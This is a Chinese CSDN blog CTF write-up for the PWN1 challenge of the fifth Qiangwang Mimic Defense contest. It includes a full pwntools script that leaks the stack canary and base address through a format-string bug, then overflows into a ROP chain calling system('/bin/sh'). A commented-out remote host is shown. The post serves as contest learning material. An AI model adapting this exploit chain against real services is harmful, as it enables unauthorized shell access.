第五届“强网”拟态防御之PWN1与近段时间对unlink的理解

最新推荐文章于 2024-05-13 10:09:48 发布
最新推荐文章于 2024-05-13 10:09:48 发布
阅读量313 收藏 1
点赞数 2
分类专栏: 二进制pwn学习 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Probeginner/article/details/127719988
版权

拟态第一题PWN1,首先正常扔进终端分析:64位,除了RELRP开启了一部分外,其余保护机制都开了。

接着来IDA看一看

观察旁边的函数发现居然有system,接着发现了“/bin/sh\x00”

Main函数的逻辑比较简单,分析然后进入func函数,发现两漏洞利用点:

显然栈溢出+格式化字符串漏洞:

思路如下:

泄露canary以及程序基础地址,计算相关地址,而后控制执行流来个简单的64位函数调用:

system(“/bin/sh\x00”)。

 

这里这个泄露程序基地址快把哥人搞傻了,gdb上明明是第43个,结果远程连接确实第45个,果然拟态。

from pwn import*
#p=remote('172.52.61.160',9999)
context.log_level="debug"
p=process('./123')

payload="%33$p%45$p"

p.sendlineafter("something",'2')  
p.sendlineafter("hello",payload)    
canary = int(p.recvuntil('00'),16)
base =int(p.recvuntil("\n")[:-1],16)-0xb54

binsh_ =  base+0x202068
#system_=  base+0x202030
system_= base +0x0a2c
p_rdi=base+0xc73

print("canary: ")
print(hex(canary))
print("base:")
print(hex(base))
payload2='a'*0xc8+p64(canary)+"abcdline"+p64(p_rdi)+p64(binsh_)+p64(system_)
p.sendline(payload2)

p.interactive()

Hvf0x
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
pwn(1)-栈溢出(上)
qq_73667990的博客
06-08 768
0x7fffffffcb18和0x7ffffffffcb28中,再后面就是函数返回地址了。gets函数可以无限写入,把前面注满,就到了存储返回地址的地址,就可以改变返回地址。gdb调试到push操作esp会减少4,ebp不变,只改变栈顶。后面的3131就是输入1的填充结果,如果我们把这个地址填充成。栈的高地址在下低地址在上,先进入的数据压入栈底。要想修改返回地址,就要知道要溢出多少个字节。可以看到,他会提示你该返回地址不存在。我们把它输入到程序,可以看到地址被修改。运行到ret后,返回会main函数,
2022拟态防御pwn(only)
m0_63437215的博客
11-10 309
2022拟态防御pwn(only)
探索Wi-PWN:开启智能Wi-Fi攻击防御新纪元
最新发布
gitblog_00068的博客
05-13 412
探索Wi-PWN:开启智能Wi-Fi攻击防御新纪元 项目地址:https://gitcode.com/samdenty/Wi-PWN 项目介绍 Wi-PWN是一个强大的开源项目,旨在为ESP8266微控制器提供固件,以执行便捷的无线网络去认证攻击(Deauthentication Attack)。它的设计既简单易用,又兼顾了功能的强大性,通过材料低廉的Arduino板,就可以对Wi-Fi安全进行深...
pwn1
weixin_45427676的博客
04-09 390
首先在vm终端checksec一下查看一下pwn1的保护机制 可以看到有canary保护,canary是一种用来防护栈溢出的保护机制。其原理是在一个函数的入口处,先从fs/gs寄存器中取出一个4字节(eax)或者8字节(rax)的值存到栈上,当函数结束时会检查这个栈上的值是否和存进去的值一致,若一致则正常退出,如果是栈溢出或者其他原因导致canary的值发生变化,那么程序将执行___stack_...
pwn3-绕过防御-ROP(1)
qq_73667990的博客
06-08 795
*ROP:**全程Return Oriented Programming(面向返回的编程),在栈溢出基础上,利用程序中已有的小片段(gadgets),改变寄存器或变量的值,从而控制程序执行流程,从而绕过NX防御,常见有ret2text,ret2syscall,ret2libc(最常用)…**gadgets:**以ret结尾的指令序列,通过这些序列可以修改某些地址的内容。ROP攻击满足的条件:1.存在溢出,且可以控制返回地址2.满足条件的gadgets。
PWN1|WP
l2645470582_的博客
04-11 660
1.检查保护机制 开启了堆栈保护 2.用32位IDA打开该文件 1.shift+f12查看字符串,我们看到有“/bin/sh”关键字符串字样 2. system("/bin/sh")地址为0x0804863A 3.进入main函数,我们看到gets()危险函数 因为gets()函数不限制用户输入,s长度为0x64,所以造成溢出 4.gdb调试 (1)cyclic 200 生成200个有序字符 (2)gdb ./pwn1 run命令运行 g...
第四届“强网拟态防御国际精英挑战赛.zip
12-07
拟态防御 CTF 国际精英挑战赛
Venom-2021-强网拟态防御国际精英挑战赛-WriteUp1
08-03
Venom-2021-强网拟态防御国际精英挑战赛-WriteUp1 本篇WriteUp主要介绍了Venom-2021强网拟态防御国际精英挑战赛中的一个Web挑战题,涉及到Node.js、Express框架、JavaScript、Crypto库、Cookie会话等技术。下面我们...
【天格】战队-已解出题目附件-第六届“强网杯”全国网络安全挑战赛
08-01
【天格】战队在第六届“强网杯”全国网络安全挑战赛中展现出卓越的技能和深入的理解,这是一场集技术、策略与团队协作于一体的顶级赛事。挑战赛中的解题附件揭示了网络安全领域的多个关键知识点,涵盖了逆向工程、...
强网杯2022 pwn 赛题解析.docx
12-18
在网络安全竞赛“强网杯”中,Pwn类赛题往往考验参赛者对内存安全漏洞利用的理解和技术应用。本题涉及的是一道基于高版本glibc的House of Apple攻击,这是一种利用大型bin(large bin)攻击的_IO_FILE结构的方法。...
关于强网拟态题目 EasyFilter1
08-03
第一个关键点在第38到44行,在pathdup变量中找到 resource= 这个关键字,如果没有这个关键字,直 第二个关键点在第46行,将 resource=
安恒杯pwn1
04-25
别人让做的一个Pwn,比较详细,记录一下
[阅读型]CTF中linux pwn的四大基本防御措施
easy_level1的博客
04-13 1454
讨论linux pwn中对二进制文件常见的四个基本防御措施 RELRO NX CANARY PIE
攻防世界pwn——pwn1
qq_62076255的博客
12-21 436
做题记录
2017广东红帽杯pwn1_writeup:简单ROP
ACdream
05-09 4122
先来正能量一波:作为一个一直没入门pwn的小菜鸟,这一段时间一直被学弟按在地上摩擦很不爽很不爽~~~~~~~~ ------------------------------------------------------------------------------------ 先给出几个学习链接: 一步一步ROP:x86 一步一步ROP:x64 论文: Return-O
习题--pwn1
m0_49959202的博客
09-18 142
文章目录pwn11.程序分析2.栈帧设计3.exp编写 pwn1 1.程序分析 首先file一下,发现是32位程序: checksec一下,发现栈段可以执行: ida分析,main函数内部调用了vulnerable_function(),可以用来栈溢出: 同时发现上面的printh可以用来泄露buf的地址,因此可以将shellcode填上buf处,然后根据泄露的地址再跳回来执行shellcode 程序一下,可以查看到泄露的buf地址: gdb调试发现需要淹没的长度为:0xffffd2d8−0xfff
pwn1(xctf)
weixin_43868725的博客
08-08 485
0x0 程序保护和流程 保护: 流程: 输入1能够读入长度为0x100的字符串到s而s距离rbp的距离为0x90存在明显的栈溢出,输入2能够输出s,输入3则退出程序。 0x1 利用过程 1.因为程序保护中开启了canary所以直接进行栈溢出就会触发canary。所以可以利用puts函数的特性一直输出字符直到遇到**\x00**,将canary的值输出出来。当输入0x87*‘a’+’/n’时不会有多余数据输出,而当输入0x88*‘a’+’/n’就会有多余数据输出,说明canary中有**\x00**。
xctf pwn1
qq_41071646的博客
05-14 951
这个题目我不知道为什么在网址上面没有打通 我只能在本机上玩了 本机的库是 2.23 所以我也按照 2.23来打了 然后这个题 可以用system 也可以用 one_gadget 用的是 one_gadget 然后说一下这个题 看起来 就是一个简单的 x64的栈溢出 然后我们看一下保护 这里面 有一个 canary 需要绕过的 其实看ida 也能看出来 v6就是我...
2019 极客巅峰 pwn1 write up
qq_43189757的博客
10-22 386
程序逻辑分析: 常规操作, 但是只能show和 delete一次note, 经过add操作后的note无编号, 所有操作都是针对ptr指向的chunk进行 漏洞点: 在edit内 可以造成8字节的溢出, 所以可以改写下一个chunk的size或改写top_chunk 的size 漏洞利用: 由于题目限制了show和delete的次数, 只能控制当前add的note的指针, 所以无法通过uaf ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值